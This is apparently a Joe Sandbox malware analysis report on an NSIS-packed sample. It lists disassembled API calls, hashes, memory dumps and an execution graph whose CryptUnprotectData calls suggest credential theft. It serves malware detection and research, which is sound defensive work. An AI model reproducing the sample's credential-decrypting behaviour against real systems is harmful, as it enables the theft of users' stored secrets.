                                                                                                            • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                            • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                            • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                            • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                            • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                            • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                            • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                            • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 2659869361-297319885
                                                                                                            • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                            • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                            • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                            • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                            APIs
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76F92EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405D76
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                            • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,76F92EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405E1E
                                                                                                            • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76F92EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76F92EE0), ref: 00405E2E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                            • String ID: 0_B
                                                                                                            • API String ID: 3248276644-2128305573
                                                                                                            • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                            • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 004059E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                            • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76F92EE0,00403A1A,76F93420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 1100898210-297319885
                                                                                                            • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                            • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                                            • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                            • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 7009116A
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 700911C7
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 700911D9
                                                                                                            • GlobalFree.KERNEL32(?), ref: 70091203
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmp
                                                                                                            • Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmp
                                                                                                            • Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1780285237-0
                                                                                                            • Opcode ID: e6ef47b9dba96a819223b15cba94aeccfe2c891bc405faf8ed71c565c50264af
                                                                                                            • Instruction ID: 3a08d5ff8cfc4124ac6568208cfc44b4dfb27c4045b72bb20fc3b67911026678
                                                                                                            • Opcode Fuzzy Hash: e6ef47b9dba96a819223b15cba94aeccfe2c891bc405faf8ed71c565c50264af
                                                                                                            • Instruction Fuzzy Hash: D831A772620101AFE3109F66DD45AAD77F9FB85B31720011AFA42E7364E774E811A7A8
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                            • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:10%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:1.7%
                                                                                                            Total number of Nodes:362
                                                                                                            Total number of Limit Nodes:27
                                                                                                            execution_graph 40808 38a120c0 40811 38a120ed 40808->40811 40809 38a1213c 40809->40809 40811->40809 40812 38a117fc 40811->40812 40813 38a11807 40812->40813 40819 38a117d0 40813->40819 40815 38a1229c 40823 384eec1a 40815->40823 40827 384e95e8 40815->40827 40816 38a122a5 40816->40809 40820 38a117db 40819->40820 40831 38a1181c 40820->40831 40822 38a122f5 40822->40815 40824 384eec22 40823->40824 40825 384eec47 40823->40825 40824->40825 40835 384ee7f4 40824->40835 40825->40816 40828 384e95f3 40827->40828 40829 384ee7f4 3 API calls 40828->40829 40830 384eec47 40828->40830 40829->40830 40830->40816 40832 38a11827 40831->40832 40833 38a12461 GetCurrentThreadId 40832->40833 40834 38a1248b 40832->40834 40833->40834 40834->40822 40837 384ee7ff 40835->40837 40836 384ef111 40836->40825 40837->40836 40841 384efa68 40837->40841 40847 384efaa1 40837->40847 40852 384efab0 40837->40852 40842 384efa78 40841->40842 40843 384efaad 40841->40843 40842->40836 40844 384efb8a 40843->40844 40857 38a100b0 40843->40857 40866 38a100c0 40843->40866 40848 384efaad 40847->40848 40849 384efb8a 40848->40849 40850 38a100b0 3 API calls 40848->40850 40851 38a100c0 3 API calls 40848->40851 40850->40849 40851->40849 40854 384efadb 40852->40854 40853 384efb8a 40853->40853 40854->40853 40855 38a100b0 3 API calls 40854->40855 40856 38a100c0 3 API calls 40854->40856 40855->40853 40856->40853 40858 38a100ba 40857->40858 40859 38a100fd CreateWindowExW 40857->40859 40860 38a100f5 40858->40860 40863 38a100b0 2 API calls 40858->40863 40871 38a10110 40858->40871 40875 38a10104 40858->40875 40862 38a10234 40859->40862 40860->40844 40862->40862 40863->40860 40868 38a100b0 3 API calls 40866->40868 40869 38a10110 CreateWindowExW 40866->40869 40870 38a10104 CreateWindowExW 40866->40870 40867 38a100f5 40867->40844 40868->40867 40869->40867 40870->40867 40872 38a10178 CreateWindowExW 40871->40872 40874 38a10234 
40872->40874 40874->40874 40876 38a10110 CreateWindowExW 40875->40876 40878 38a10234 40876->40878 40878->40878 40879 38a12020 SetTimer 40880 38a1208c 40879->40880 40881 38a1b070 40882 38a1b080 40881->40882 40885 38a1a094 40882->40885 40886 38a1a09f 40885->40886 40889 38a1a1a4 40886->40889 40891 38a1a1af 40889->40891 40890 38a1b099 40891->40890 40897 38a16c00 40891->40897 40894 38a16c00 3 API calls 40895 38a1b429 40894->40895 40895->40890 40896 38a16c00 3 API calls 40895->40896 40896->40890 40898 38a16c0a 40897->40898 40901 38a16db8 40898->40901 40905 38a16e77 40901->40905 40917 38a16e88 40901->40917 40902 38a16c3e 40902->40894 40907 38a16ec0 40905->40907 40906 38a16f15 40906->40902 40907->40906 40909 38a1722f 40907->40909 40929 38a16fa0 CreateWindowExW CreateWindowExW CreateWindowExW 40907->40929 40910 38a17447 40909->40910 40912 38a17382 40909->40912 40930 38a14108 40909->40930 40910->40912 40913 38a16c00 3 API calls 40910->40913 40912->40902 40914 38a17658 40913->40914 40915 38a16c00 3 API calls 40914->40915 40916 38a1767c 40914->40916 40915->40916 40918 38a16ec0 40917->40918 40920 38a16f15 40918->40920 40922 38a1722f 40918->40922 40947 38a16fa0 CreateWindowExW CreateWindowExW CreateWindowExW 40918->40947 40920->40902 40921 38a17447 40924 38a17382 40921->40924 40925 38a16c00 3 API calls 40921->40925 40922->40921 40923 38a14108 3 API calls 40922->40923 40922->40924 40923->40921 40924->40902 40926 38a17658 40925->40926 40927 38a16c00 3 API calls 40926->40927 40928 38a1767c 40926->40928 40927->40928 40929->40909 40931 38a14113 40930->40931 40936 38a18400 40931->40936 40933 38a1901f 40934 38a16e88 3 API calls 40933->40934 40935 38a19039 40934->40935 40935->40910 40938 38a1840b 40936->40938 40937 38a191c8 40937->40933 40938->40937 40939 38a16e88 3 API calls 40938->40939 40941 38a1910f 40939->40941 40940 38a18400 3 API calls 40940->40941 40941->40940 40942 38a191ea 40941->40942 40943 38a1922d 40942->40943 40944 384efa68 3 API calls 40942->40944 40945 384efab0 3 API 
calls 40942->40945 40946 384efaa1 3 API calls 40942->40946 40943->40933 40944->40943 40945->40943 40946->40943 40947->40922 40948 ad030 40949 ad048 40948->40949 40950 ad0a2 40949->40950 40956 38a103f0 40949->40956 40959 38a102c8 40949->40959 40964 38a102b7 40949->40964 40969 38a11bd0 40949->40969 40974 38a11bc0 40949->40974 40958 38a10407 40956->40958 40979 38a10841 40956->40979 40958->40950 40960 38a102ee 40959->40960 40962 38a11bc0 3 API calls 40960->40962 40963 38a11bd0 3 API calls 40960->40963 40961 38a1030f 40961->40950 40962->40961 40963->40961 40965 38a102c8 40964->40965 40967 38a11bc0 3 API calls 40965->40967 40968 38a11bd0 3 API calls 40965->40968 40966 38a1030f 40966->40950 40967->40966 40968->40966 40970 38a11bfd 40969->40970 40971 38a11c2f 40970->40971 41022 38a11d48 40970->41022 41032 38a11d58 40970->41032 40975 38a11bd0 40974->40975 40976 38a11c2f 40975->40976 40977 38a11d48 3 API calls 40975->40977 40978 38a11d58 3 API calls 40975->40978 40977->40976 40978->40976 40980 38a10856 40979->40980 40982 38a10938 40979->40982 40980->40958 40983 38a10948 40982->40983 40984 38a10965 40983->40984 40987 38a10980 40983->40987 40999 38a10970 40983->40999 40984->40980 40988 38a109c6 GetCurrentProcess 40987->40988 40990 38a10a11 40988->40990 40991 38a10a18 GetCurrentThread 40988->40991 40990->40991 40992 38a10a55 GetCurrentProcess 40991->40992 40993 38a10a4e 40991->40993 40994 38a10a8b 40992->40994 40993->40992 41011 38a10f31 40994->41011 41013 38a10b4f 40994->41013 40995 38a10ab3 GetCurrentThreadId 40996 38a10ae4 40995->40996 40996->40984 41000 38a10980 GetCurrentProcess 40999->41000 41002 38a10a18 GetCurrentThread 41000->41002 41005 38a10a11 41000->41005 41003 38a10a55 GetCurrentProcess 41002->41003 41004 38a10a4e 41002->41004 41006 38a10a8b 41003->41006 41004->41003 41005->41002 41009 38a10f31 41006->41009 41010 38a10b4f 2 API calls 41006->41010 41007 38a10ab3 GetCurrentThreadId 41008 38a10ae4 41007->41008 41008->40984 41009->41007 41010->41007 41012 38a10f3a 
41011->41012 41012->40995 41017 38a10bc0 41013->41017 41020 38a10bc8 DuplicateHandle 41013->41020 41014 38a10b8e 41014->40995 41018 38a10bc8 DuplicateHandle 41017->41018 41019 38a10c5e 41018->41019 41019->41014 41021 38a10c5e 41020->41021 41021->41014 41023 38a11d58 41022->41023 41024 38a11d66 41023->41024 41026 38a11d98 41023->41026 41025 38a11d6e 41024->41025 41042 38a11dc0 41024->41042 41046 38a11db1 41024->41046 41025->40971 41027 38a117d0 GetCurrentThreadId 41026->41027 41028 38a11da4 41027->41028 41028->40971 41029 38a11dac 41029->40971 41033 38a11d93 41032->41033 41034 38a11d66 41032->41034 41033->41034 41036 38a11d98 41033->41036 41035 38a11d6e 41034->41035 41040 38a11db1 CallWindowProcW 41034->41040 41041 38a11dc0 CallWindowProcW 41034->41041 41035->40971 41037 38a117d0 GetCurrentThreadId 41036->41037 41038 38a11da4 41037->41038 41038->40971 41039 38a11dac 41039->40971 41040->41039 41041->41039 41043 38a11e02 41042->41043 41045 38a11e09 41042->41045 41044 38a11e5a CallWindowProcW 41043->41044 41043->41045 41044->41045 41045->41029 41047 38a11dba 41046->41047 41049 38a11e09 41046->41049 41048 38a11e5a CallWindowProcW 41047->41048 41047->41049 41048->41049 41049->41029 41050 15b158 41057 15b174 41050->41057 41051 15b1a3 41066 38a12720 41051->41066 41072 38a12730 41051->41072 41058 378a0188 41057->41058 41062 378a0198 41057->41062 41059 378a018c 41058->41059 41078 378ac638 41059->41078 41060 378a01da 41060->41051 41063 378a01a4 41062->41063 41065 378ac638 CryptUnprotectData 41063->41065 41064 378a01da 41064->41051 41065->41064 41067 38a1273f 41066->41067 41068 38a10938 10 API calls 41067->41068 41069 38a12746 41068->41069 41110 38a1188c 41069->41110 41073 38a1273f 41072->41073 41074 38a10938 10 API calls 41073->41074 41075 38a12746 41074->41075 41076 38a1188c 15 API calls 41075->41076 41077 15b1b1 41076->41077 41080 378ac66a 41078->41080 41079 378acaf9 41079->41060 41080->41079 41082 378acf01 41080->41082 41083 378acf10 41082->41083 41087 378ad540 
41083->41087 41095 378ad550 41083->41095 41084 378acf80 41084->41080 41088 378ad550 41087->41088 41089 378ad629 41088->41089 41093 378ad540 CryptUnprotectData 41088->41093 41094 378ad550 CryptUnprotectData 41088->41094 41103 378ad730 41088->41103 41107 378ad1ec 41089->41107 41093->41089 41094->41089 41096 378ad575 41095->41096 41098 378ad629 41095->41098 41096->41098 41100 378ad730 CryptUnprotectData 41096->41100 41101 378ad540 CryptUnprotectData 41096->41101 41102 378ad550 CryptUnprotectData 41096->41102 41097 378ad1ec CryptUnprotectData 41099 378ad7f5 41097->41099 41098->41097 41099->41084 41100->41098 41101->41098 41102->41098 41104 378ad6fc 41103->41104 41104->41103 41105 378ad1ec CryptUnprotectData 41104->41105 41106 378ad7f5 41105->41106 41106->41089 41108 378ad9e0 CryptUnprotectData 41107->41108 41109 378ad7f5 41108->41109 41109->41084 41112 38a11897 41110->41112 41113 38a12866 41112->41113 41114 38a11934 41112->41114 41117 38a1193f 41114->41117 41115 38a12ed4 41115->41112 41116 38a12e79 41119 38a12ac4 11 API calls 41116->41119 41121 38a12ea9 41116->41121 41117->41115 41117->41116 41125 38a13e40 41117->41125 41119->41121 41120 38a12ec1 41120->41115 41136 38a1d608 41120->41136 41142 38a1d5f8 41120->41142 41121->41115 41130 38a12ac4 41121->41130 41126 38a13e61 41125->41126 41127 38a13e85 41126->41127 41148 38a13fe0 41126->41148 41154 38a13ff0 41126->41154 41127->41116 41132 38a12acf 41130->41132 41131 38a1d0a1 41131->41120 41132->41131 41133 38a10938 10 API calls 41132->41133 41134 38a1d0bb 41133->41134 41229 38a1c544 41134->41229 41138 38a1d66d 41136->41138 41137 38a1d6ba 41137->41115 41138->41137 41139 38a1d899 41138->41139 41236 38a1c60c 41138->41236 41140 38a10938 10 API calls 41139->41140 41140->41137 41147 38a1d608 41142->41147 41143 38a1d899 41144 38a10938 10 API calls 41143->41144 41145 38a1d6ba 41144->41145 41145->41115 41146 38a1c60c DispatchMessageW 41146->41147 41147->41143 41147->41145 41147->41146 41149 38a13ffd 41148->41149 41150 38a10938 10 API 
